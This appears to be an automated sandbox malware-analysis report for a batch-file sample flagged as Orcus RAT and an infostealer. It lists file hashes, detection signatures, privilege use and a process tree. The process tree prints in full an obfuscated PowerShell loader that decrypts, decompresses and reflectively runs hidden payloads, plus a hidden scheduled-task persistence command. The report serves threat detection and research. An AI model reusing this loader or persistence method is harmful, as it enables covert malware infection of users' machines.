Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
24-04-2024 01:14
Static task
static1
Behavioral task
behavioral1
Sample
31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4.bat
Resource
win7-20240221-en
General
-
Target
31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4.bat
-
Size
3.5MB
-
MD5
45730c9d81cdc2677ea2bd082eb79edb
-
SHA1
7ece7b975ab6506d83dac94f685e2cedbe56dd6b
-
SHA256
31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
-
SHA512
d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
-
SSDEEP
49152:mR8s3zr/pxAN80OHguszxrEC/agxlnUrLvlKNNwI:d
Malware Config
Signatures
-
Detects executables containing common artifacts observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/4544-54-0x00000229B7FD0000-0x00000229B82CA000-memory.dmp INDICATOR_SUSPICIOUS_GENInfoStealer -
Detects executables manipulated with Fody 1 IoCs
resource yara_rule behavioral2/memory/4544-54-0x00000229B7FD0000-0x00000229B82CA000-memory.dmp INDICATOR_EXE_Packed_Fody -
Orcurs Rat Executable 1 IoCs
resource yara_rule behavioral2/memory/4544-54-0x00000229B7FD0000-0x00000229B82CA000-memory.dmp orcus -
Blocklisted process makes network request 2 IoCs
flow pid Process 15 4544 powershell.exe 19 4544 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 440 powershell.exe 440 powershell.exe 3484 powershell.exe 3484 powershell.exe 4544 powershell.exe 4544 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 440 powershell.exe Token: SeDebugPrivilege 3484 powershell.exe Token: SeIncreaseQuotaPrivilege 3484 powershell.exe Token: SeSecurityPrivilege 3484 powershell.exe Token: SeTakeOwnershipPrivilege 3484 powershell.exe Token: SeLoadDriverPrivilege 3484 powershell.exe Token: SeSystemProfilePrivilege 3484 powershell.exe Token: SeSystemtimePrivilege 3484 powershell.exe Token: SeProfSingleProcessPrivilege 3484 powershell.exe Token: SeIncBasePriorityPrivilege 3484 powershell.exe Token: SeCreatePagefilePrivilege 3484 powershell.exe Token: SeBackupPrivilege 3484 powershell.exe Token: SeRestorePrivilege 3484 powershell.exe Token: SeShutdownPrivilege 3484 powershell.exe Token: SeDebugPrivilege 3484 powershell.exe Token: SeSystemEnvironmentPrivilege 3484 powershell.exe Token: SeRemoteShutdownPrivilege 3484 powershell.exe Token: SeUndockPrivilege 3484 powershell.exe Token: SeManageVolumePrivilege 3484 powershell.exe Token: 33 3484 powershell.exe Token: 34 3484 powershell.exe Token: 35 3484 powershell.exe Token: 36 3484 powershell.exe Token: SeIncreaseQuotaPrivilege 3484 powershell.exe Token: SeSecurityPrivilege 3484 powershell.exe Token: SeTakeOwnershipPrivilege 3484 powershell.exe Token: SeLoadDriverPrivilege 3484 powershell.exe Token: SeSystemProfilePrivilege 3484 powershell.exe Token: SeSystemtimePrivilege 3484 powershell.exe Token: SeProfSingleProcessPrivilege 3484 powershell.exe Token: SeIncBasePriorityPrivilege 3484 powershell.exe Token: SeCreatePagefilePrivilege 3484 powershell.exe Token: SeBackupPrivilege 3484 powershell.exe Token: SeRestorePrivilege 3484 powershell.exe Token: SeShutdownPrivilege 3484 powershell.exe Token: SeDebugPrivilege 3484 powershell.exe Token: SeSystemEnvironmentPrivilege 3484 powershell.exe Token: SeRemoteShutdownPrivilege 3484 powershell.exe Token: SeUndockPrivilege 3484 powershell.exe Token: SeManageVolumePrivilege 3484 powershell.exe Token: 33 3484 powershell.exe Token: 34 3484 powershell.exe Token: 35 3484 powershell.exe Token: 36 3484 powershell.exe Token: SeIncreaseQuotaPrivilege 3484 powershell.exe Token: SeSecurityPrivilege 3484 powershell.exe Token: SeTakeOwnershipPrivilege 3484 powershell.exe Token: SeLoadDriverPrivilege 3484 powershell.exe Token: SeSystemProfilePrivilege 3484 powershell.exe Token: SeSystemtimePrivilege 3484 powershell.exe Token: SeProfSingleProcessPrivilege 3484 powershell.exe Token: SeIncBasePriorityPrivilege 3484 powershell.exe Token: SeCreatePagefilePrivilege 3484 powershell.exe Token: SeBackupPrivilege 3484 powershell.exe Token: SeRestorePrivilege 3484 powershell.exe Token: SeShutdownPrivilege 3484 powershell.exe Token: SeDebugPrivilege 3484 powershell.exe Token: SeSystemEnvironmentPrivilege 3484 powershell.exe Token: SeRemoteShutdownPrivilege 3484 powershell.exe Token: SeUndockPrivilege 3484 powershell.exe Token: SeManageVolumePrivilege 3484 powershell.exe Token: 33 3484 powershell.exe Token: 34 3484 powershell.exe Token: 35 3484 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4544 powershell.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 4544 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1800 wrote to memory of 440 1800 cmd.exe 85 PID 1800 wrote to memory of 440 1800 cmd.exe 85 PID 440 wrote to memory of 3484 440 powershell.exe 88 PID 440 wrote to memory of 3484 440 powershell.exe 88 PID 440 wrote to memory of 4648 440 powershell.exe 92 PID 440 wrote to memory of 4648 440 powershell.exe 92 PID 4648 wrote to memory of 4856 4648 WScript.exe 93 PID 4648 wrote to memory of 4856 4648 WScript.exe 93 PID 4856 wrote to memory of 4544 4856 cmd.exe 95 PID 4856 wrote to memory of 4544 4856 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Local\Temp\31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_636_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_636.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_636.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_636.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Roaming\startup_str_636.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4544
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
Filesize
1KB
MD5345e9f98bd5ff1def2f4cd73d9f83a8e
SHA19132828267045915fd009f9eac20def8371814be
SHA256bc9dbd892f1a74587f2a6810ede52e86c81872e9703c7c8ab05039994a45f1aa
SHA5125bf601c8463ba6a877a8f399bcfbd3b8ae456a008ab25461c574a6cdb98fff44bdac0b1304a526438b6c87d4ec735a382e2af3b17580a71f3fe54f5e48ff579f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.5MB
MD545730c9d81cdc2677ea2bd082eb79edb
SHA17ece7b975ab6506d83dac94f685e2cedbe56dd6b
SHA25631f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4
SHA512d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687
-
Filesize
115B
MD5f7285ab2d70b7dc40bc62629bbffa02e
SHA14844df19650968c98fa06bec7a0b1ab0832165da
SHA256bf51d5de1fd2aac3f0b781c6cda7883284e94352e3b70fe010402b9a22406340
SHA512b67e31bdf10842eac2b138585c4c2984a42a713b4f6f01cb5edcbef8d7dc26025ce107e6e31a8b24aae849b103a9edbb293cc104dc132d158befececce5f979c